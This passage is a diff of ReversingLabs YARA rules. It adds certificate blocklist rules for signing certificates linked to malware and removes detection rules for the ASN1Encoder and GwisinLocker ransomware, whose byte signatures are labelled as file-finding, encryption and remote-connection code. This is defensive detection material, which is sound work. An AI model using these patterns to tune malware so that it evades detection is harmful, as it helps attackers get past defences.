+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMCERT,LLC" and ( pe.signatures [ i ] . serial == "00:bd:e1:d6:dc:36:22:72:4f:42:7a:39:e6:a3:4f:51:24" or pe.signatures [ i ] . serial == "bd:e1:d6:dc:36:22:72:4f:42:7a:39:e6:a3:4f:51:24" ) and 1628553600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Asn1Encoder : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_5C9F5F96726A6E6Fc3B8Bb153Ac82Af2 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects ASN1Encoder ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "5fa361e5-4ab0-5856-92b2-6f434e33c350"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "f7619c39-33a0-5f99-b911-9d8a61a4683d"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.ASN1Encoder.yara#L1-L136"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12370-L12386"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "000fd846fa5f09af19ead4623bb5a8eb51cdb4c751013569bf070710d3e0d61d"
+		logic_hash = "a61bcc4a90a75a429366e3f93929005b67325eccc6cad3df6b7a0c3692597828"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "ASN1Encoder"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$remote_connection_p1 = {
-            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 0F B6
-            84 34 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 2B C6 68 ?? ?? ?? ?? 03 C0 50 53 E8 ?? ?? ?? ??
-            83 C4 ?? 83 C3 ?? 46 83 FE ?? 72 ?? 8B 5C 24 ?? BE ?? ?? ?? ?? A1 ?? ?? ?? ?? 53 50
-            68 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 56 50
-            E8 ?? ?? ?? ?? 33 C0 83 C4 ?? 8B F0 85 FF 74 ?? A1 ?? ?? ?? ?? 0F B6 04 06 50 B8 ??
-            ?? ?? ?? 2B C6 68 ?? ?? ?? ?? 03 C0 50 53 E8 ?? ?? ?? ?? 83 C4 ?? 83 C3 ?? 46 3B F7
-            72 ?? 8B 5C 24 ?? A1 ?? ?? ?? ?? BE ?? ?? ?? ?? 53 50 68 ?? ?? ?? ?? 56 50 E8 ?? ??
-            ?? ?? A1 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 8D 8C 24 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? C1 E8 ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 8D 94 24 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 8B FB 8B F0 0F B6
-            84 34 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 2B C6 68 ?? ?? ?? ?? 03 C0 50 57 E8 ?? ?? ?? ??
-            83 C4 ?? 83 C7 ?? 46 83 FE ?? 72 ?? A1 ?? ?? ?? ?? 53 50 68 ?? ?? ?? ?? BB ?? ?? ??
-            ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 50 68 ?? ??
-            ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 50 68 ??
-            ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 50 68
-            ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? 33 F6 8D 51 ?? 66 8B 01
-            83 C1 ?? 66 3B C6 75 ?? 2B CA 8B 15 ?? ?? ?? ?? D1 F9 8D 72 ?? 8A 02 42 84 C0 75 ??
-            8B 3D ?? ?? ?? ?? 2B D6 8D 04 0A 8D 34 45 ?? ?? ?? ?? 56 6A ?? FF D7 50 FF 15 ?? ??
-            ?? ?? 8B D8 8D 04 36 50 6A ?? 89 5C 24 ?? FF D7 50 FF 15 ?? ?? ?? ?? FF 35 ?? ?? ??
-            ?? 8B F8 FF 35 ?? ?? ?? ?? 89 7C 24 ?? 68 ?? ?? ?? ?? 56 53 E8 ?? ?? ?? ?? 33 C9 89
-        }
-		$remote_connection_p2 = {
-            44 24 ?? 83 C4 ?? 89 8C 24 ?? ?? ?? ?? 8B D9 85 C0 7E ?? 8B 44 24 ?? 0F B7 04 58 66
-            89 84 24 ?? ?? ?? ?? 83 F8 ?? 75 ?? 83 EF ?? 66 8B 47 ?? 83 C7 ?? 66 3B C1 75 ?? BE
-            ?? ?? ?? ?? 83 C3 ?? A5 A5 66 A5 EB ?? 8D 94 24 ?? ?? ?? ?? 8B F2 66 8B 02 83 C2 ??
-            66 3B C1 75 ?? 2B D6 83 EF ?? 66 8B 47 ?? 83 C7 ?? 66 3B C1 75 ?? 8B CA C1 E9 ?? F3
-            A5 8B CA 83 E1 ?? F3 A4 33 C9 8B 7C 24 ?? 43 3B 5C 24 ?? 7C ?? FF 74 24 ?? 51 FF 15
-            ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 50 FF D6 FF 35 ?? ?? ?? ?? 33 C0 50 FF 15 ?? ?? ?? ??
-            50 FF D6 8B 5C 24 ?? 53 33 DB 53 FF 15 ?? ?? ?? ?? 50 FF D6 FF 74 24 ?? 53 FF 15 ??
-            ?? ?? ?? 50 FF D6 FF 74 24 ?? 53 FF 15 ?? ?? ?? ?? 50 FF D6 8B 5C 24 ?? 89 3D ?? ??
-            ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 33 FF E9 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ??
-            83 F8 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 57
-            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 89 44 24 ?? 85 C0
-            0F 84 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 8B F3 89 5C 24 ?? 8D 4E ?? 8A 06 46 84
-            C0 75 ?? 8B 3D ?? ?? ?? ?? 2B F1 68 ?? ?? ?? ?? 6A ?? FF D7 50 FF 15 ?? ?? ?? ?? 89
-            44 24 ?? 85 DB 0F 84 ?? ?? ?? ?? 81 FE ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            6A ?? FF D7 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 89 44 24 ?? 8D 84 24 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ??
-            ?? ?? BA ?? ?? ?? ?? C1 E8 ?? 50 E8 ?? ?? ?? ?? 59 8D 94 24 ?? ?? ?? ?? 8D 8C 24 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 8B C8 8B F8 3B FE 73 ?? 81 F9 ?? ?? ?? ?? 74 ?? FF 74
-            24 ?? 8D 84 24 ?? ?? ?? ?? 50 8D 04 1F 50 E8
-        }
-		$encrypt_files_p1 = {
-            8B CA 8D 84 24 ?? ?? ?? ?? C1 E9 ?? F3 A5 53 68 ?? ?? ?? ?? 6A ?? 53 6A ?? 8B CA 83
-            E1 ?? 68 ?? ?? ?? ?? F3 A4 50 FF 15 ?? ?? ?? ?? 8B D8 33 FF 89 5C 24 ?? 89 3D ?? ??
-            ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 44
-            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 83 FB ?? 74 ?? 85 DB 0F 85 ?? ?? ?? ?? 33
-            F6 8D 8C 24 ?? ?? ?? ?? 8B DE E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? BE ?? ?? ?? ?? 50
-            8D 44 24 ?? 8B D6 50 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 8B CE E8 ?? ?? ?? ?? 33 D2
-            8D 88 ?? ?? ?? ?? 8D 81 ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ?? 8B 44 24 ?? C1 E8 ?? 89
-            44 24 ?? 83 C0 ?? 89 44 24 ?? 8B F0 8B C1 F7 F6 40 0F AF 44 24 ?? 50 6A ?? 89 44 24
-            ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? 6A ?? FF 15 ?? ??
-            ?? ?? 50 FF 15 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 89 44 24 ?? E8 ?? ?? ?? ?? 8B 54 24 ??
-            8D 44 24 ?? 83 C4 ?? 81 C2 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 8D 8C 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 39 5C 24 ?? 76 ?? 8B 44 24 ?? 8D
-            54 24 ?? 8B 4C 24 ?? 2B C3 3B 44 24 ?? 0F 42 F0 8D 84 24 ?? ?? ?? ?? 50 8B 44 24 ??
-            8D 0C 39 68 ?? ?? ?? ?? 03 C3 56 50 E8 ?? ?? ?? ?? 03 7C 24 ?? 83 C4 ?? 03 DE 3B 7C
-            24 ?? 72 ?? 33 FF 8D 84 24 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 6A ?? 57 6A ?? 68 ?? ?? ??
-            ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 5C 24 ?? 83 FB ?? 74 ?? 85 DB 74 ?? 57 8D 44 24 ??
-            89 7C 24 ?? 8B 3D ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF D7 33 F6 8D 44
-        }
-		$encrypt_files_p2 = {
-            24 ?? 56 50 FF 74 24 ?? FF 74 24 ?? 53 FF D7 33 FF 68 ?? ?? ?? ?? 57 68 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 83 C4 ?? FF 74 24 ?? 57 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 50 FF D6
-            FF 74 24 ?? 57 FF 15 ?? ?? ?? ?? 50 FF D6 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ??
-            ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 6A ?? FF 15
-            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 33 F6 56 53 FF 15 ?? ?? ?? ?? 3D ??
-            ?? ?? ?? 76 ?? 39 35 ?? ?? ?? ?? 75 ?? 56 53 FF 15 ?? ?? ?? ?? 56 8B F8 B8 ?? ?? ??
-            ?? 56 50 53 2B F8 FF 15 ?? ?? ?? ?? 57 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
-            56 8D 8C 24 ?? ?? ?? ?? A3 ?? ?? ?? ?? 51 57 50 53 FF 15 ?? ?? ?? ?? 33 C0 50 50 50
-            53 FF 15 ?? ?? ?? ?? 33 F6 8D 84 24 ?? ?? ?? ?? 56 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            53 FF 15 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF
-            15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D8 6A ?? 89 5C 24 ?? FF 15 ??
-            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 50
-            FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? BA
-            ?? ?? ?? ?? C1 E8 ?? 50 E8 ?? ?? ?? ?? 59 8D 94 24 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 85 C9 75 ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ??
-            50 FF 15
-        }
-		$find_files = {
-            53 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 35 ?? ?? ?? ?? FF D6 83 C4 ?? 53 8D 85 ??
-            ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF D6 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ??
-            ?? 50 FF 15 ?? ?? ?? ?? 8B F0 89 75 ?? 83 FE ?? 0F 84 ?? ?? ?? ?? 85 F6 0F 84 ?? ??
-            ?? ?? 33 DB B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ??
-            66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 8B C3 EB ?? 1B C0 83
-            C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75
-            ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 8B
-            C3 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ??
-            F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 59 BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3
-            A5 6A ?? 59 BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3 A5 66 A5 6A ?? 59 BE ?? ?? ?? ?? 8D
-            BD ?? ?? ?? ?? F3 A5 66 A5 BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? A5 A5 A5 A5 50 E8 ?? ??
-            ?? ?? 59 8B F0 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ??
-            ?? ?? 50 56 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ??
-            59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? FF 75 ??
-            8B 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B 75 ?? E9 ?? ?? ?? ?? FF 75 ?? E9 ??
-            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 66 39 1F 0F 84
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "1105 SOFTWARE LLC" and pe.signatures [ i ] . serial == "5c:9f:5f:96:72:6a:6e:6f:c3:b8:bb:15:3a:c8:2a:f2" and 1679061408 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_6E889Bb3B7F7194B674C6A0335A608E0 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "d164846d-9552-5108-8b01-1b4b3e7c0b60"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12388-L12404"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "fa2a47f4fb822089fcc958850ce516c8c5d95a6d9b575f3b1d1d4a2ceb2537e4"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CLEVERCONTROL LLC" and pe.signatures [ i ] . serial == "6e:88:9b:b3:b7:f7:19:4b:67:4c:6a:03:35:a6:08:e0" and 1646956800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Linux_Ransomware_Gwisinlocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_0F62F760704Bdf8Dc30C7Baa7376F484 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects GwisinLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9f00e1b4-3692-5824-b614-724073532c1f"
-		date = "2022-10-11"
-		modified = "2022-10-11"
+		id = "fe326fb9-fe1e-5fc9-8599-6b4cfd6506dd"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Linux.Ransomware.GwisinLocker.yara#L1-L354"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12406-L12422"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "c23c0b73bbefbd644ffe1398e1f14eec3a89945cb3c3ccbc6f46c57046b53505"
+		logic_hash = "d54d52e116b9404782ce80664f218d2e142577dac672c53c41b82f0466c7375a"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "GwisinLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$init_key_v1 = {
-            55 57 56 53 E8 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 8D 74 24 ?? 56 E8 ??
-            ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 31 FF 83 EC ?? 56 E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 89
-            F8 5B 5E 5F 5D C3 66 90 31 D2 31 C0 89 54 04 ?? 83 C0 ?? 83 F8 ?? 72 ?? 83 EC ?? 8D
-            83 ?? ?? ?? ?? 50 8D 83 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 C5 8D 7C 24 ?? 85
-            C0 74 ?? 50 6A ?? 6A ?? 57 E8 ?? ?? ?? ?? 89 2C 24 E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ??
-            6A ?? 57 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? C7 04 24 ?? ?? ?? ?? 83 EC ?? 8D 44
-            24 ?? 50 FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 6A ?? FF B3
-            ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 56 FF B3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0
-            0F 94 C0 0F B6 C0 89 C7 E9
-        }
-		$encrypt_files_v1_p1 = {
-            55 B9 ?? ?? ?? ?? 57 56 53 E8 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 8B 84
-            24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 8B 84 24
-            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 8D 44 24 ?? 83 EC ?? 89 44 24 ?? 89
-            C7 31 C0 F3 AB C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
-            ?? 6A ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 84 24 ?? ?? ?? ?? 89 44
-            24 ?? 8D 84 24 ?? ?? ?? ?? 89 44 24 ?? 31 FF 83 EC ?? 68 ?? ?? ?? ?? FF 74 24 ?? E8
-            ?? ?? ?? ?? 58 5A 6A ?? FF 74 24 ?? E8 ?? ?? ?? ?? 59 5E 6A ?? FF 74 24 ?? E8 ?? ??
-            ?? ?? 81 C4 ?? ?? ?? ?? 89 F8 5B 5E 5F 5D C3 8D 74 26 ?? 90 83 EC ?? 6A ?? 8D 84 24
-            ?? ?? ?? ?? 89 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D B4 24 ?? ?? ?? ?? 89 74 24 ??
-            85 C0 74 ?? 83 EC ?? 6A ?? FF 74 24 ?? 56 E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? 59 5E 50
-            89 C5 FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? 89 C6 83 C4 ?? 85 C0 0F 84 ??
-            ?? ?? ?? 83 EC ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 89 C7 FF B4 24 ??
-            ?? ?? ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 01 FA 89 D0 8B 54
-            24 ?? 89 10 0F B7 54 24 ?? 66 89 50 ?? 0F B6 54 24 ?? 88 50 ?? 8B 94 24 ?? ?? ?? ??
-            C6 44 3A ?? ?? BF ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ??
-            ?? ?? ?? B9 ?? ?? ?? ?? 83 C4 ?? 39 C1 B9 ?? ?? ?? ?? 19 D1 7D ?? 83 EC ?? FF B4 24
-            ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 83 EC ?? FF 74
-            24 ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8D 74 26 ?? 90 83 EC ?? 56 E8 ?? ?? ??
-            ?? 58 5A 55 FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? 89 C6 83 C4 ?? 85 C0 0F
-        }
-		$encrypt_files_v1_p2 = {
-            84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 8B 74 24
-            ?? 8B 7C 24 ?? 89 D1 89 74 24 ?? 89 7C 24 ?? 83 C4 ?? 39 F0 19 F9 7D ?? 89 44 24 ??
-            89 54 24 ?? 8B 7C 24 ?? 8B 74 24 ?? 89 F9 89 F5 C1 F9 ?? 89 C8 89 4C 24 ?? 31 CD 8B
-            74 24 ?? C1 F8 ?? 89 44 24 ?? 89 E8 29 F0 8B 74 24 ?? 89 C7 83 E7 ?? 31 CF 89 F8 8B
-            7C 24 ?? 29 F0 8B 74 24 ?? 89 FA 19 FA 8B 7C 24 ?? 29 C6 89 74 24 ?? 19 D7 83 EC ??
-            89 7C 24 ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ??
-            B9 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 31 C0 F3 AB 89 94 24 ?? ?? ?? ?? 56 6A ?? FF 74
-            24 ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 C7 85 C0 0F 84 ?? ?? ?? ?? 83
-            EC ?? FF 74 24 ?? E8 ?? ?? ?? ?? 5F 5D FF B4 24 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4
-            ?? 89 C7 85 C0 0F 84 ?? ?? ?? ?? 8B B4 24 ?? ?? ?? ?? 8B 54 24 ?? 31 FF 8B 44 24 ??
-            89 7C 24 ?? 89 74 24 ?? 8D 74 24 ?? 89 D7 89 74 24 ?? 8D B3 ?? ?? ?? ?? 09 C7 89 74
-        }
-		$encrypt_files_v1_p3 = {
-            24 ?? 0F 84 ?? ?? ?? ?? 8B 4C 24 ?? 8B 6C 24 ?? 89 4C 24 ?? EB ?? 66 90 83 EC ?? 31
-            ED FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? FF 74 24 ?? FF 74
-            24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 31 D2 6A ?? 8B 84 24 ?? ?? ?? ?? 52 F7 D8
-            50 57 E8 ?? ?? ?? ?? 57 FF B4 24 ?? ?? ?? ?? 6A ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B 44 24 ?? 8B BC 24 ?? ?? ?? ?? 8B 54 24 ?? 29 F8 19 EA 89 44 24 ?? 89 D6 89 54
-            24 ?? 83 C4 ?? 09 C6 74 ?? 39 84 24 ?? ?? ?? ?? 89 E9 8B 7C 24 ?? 19 D1 0F 4C 84 24
-            ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? 8B 84 24 ?? ?? ??
-            ?? 89 44 24 ?? 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? 57
-            FF B4 24 ?? ?? ?? ?? 6A ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 39 84 24 ??
-            ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 EC ?? BF ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4
-            ?? E9 ?? ?? ?? ?? 83 EC ?? FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? E9
-        }
-		$find_files_v1_p1 = {
-            55 89 C5 57 E8 ?? ?? ?? ?? 81 C7 ?? ?? ?? ?? 56 53 81 EC ?? ?? ?? ?? 89 54 24 ?? 8B
-            B4 24 ?? ?? ?? ?? 89 7C 24 ?? 89 FB 89 4C 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 44 24
-            ?? C7 44 24 ?? ?? ?? ?? ?? 85 C0 74 ?? 8D 58 ?? 80 7C 05 ?? ?? 0F 45 D8 89 5C 24 ??
-            8B BC 24 ?? ?? ?? ?? 83 E7 ?? 74 ?? 83 EC ?? 8D 44 24 ?? 89 44 24 ?? 50 55 6A ?? 8B
-            5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 5C 24 ?? E8 ?? ?? ?? ?? 8B 00 83 F8
-            ?? 0F 85 ?? ?? ?? ?? BF ?? ?? ?? ?? C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 8D
-            B4 26 ?? ?? ?? ?? 66 90 83 EC ?? 8D 44 24 ?? 89 44 24 ?? 50 55 6A ?? 8B 5C 24 ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 85 C0 78 ?? 8B 84 24 ?? ?? ?? ?? 25 ?? ?? ?? ?? 3D ?? ?? ?? ??
-            0F 84 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? C6 44 24 ?? ?? 31 FF C7 44 24 ??
-            ?? ?? ?? ?? 8B 54 24 ?? 8B 44 24 ?? F6 84 24 ?? ?? ?? ?? ?? 74 ?? 85 F6 0F 84 ?? ??
